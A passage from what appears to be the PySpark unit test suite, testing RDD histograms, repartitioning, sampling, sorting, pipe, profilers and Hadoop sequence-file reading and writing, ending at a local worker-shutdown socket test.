rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class ProfilerTests2(unittest.TestCase):
def test_profiler_disabled(self):
sc = SparkContext(conf=SparkConf().set("spark.python.profile", "false"))
try:
self.assertRaisesRegexp(
RuntimeError,
"'spark.python.profile' configuration must be set",
lambda: sc.show_profiles())
self.assertRaisesRegexp(
RuntimeError,
"'spark.python.profile' configuration must be set",
lambda: sc.dump_profiles("/tmp/abc"))
finally:
sc.stop()
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
oldconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
newconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.Text",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/newdataset"
}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
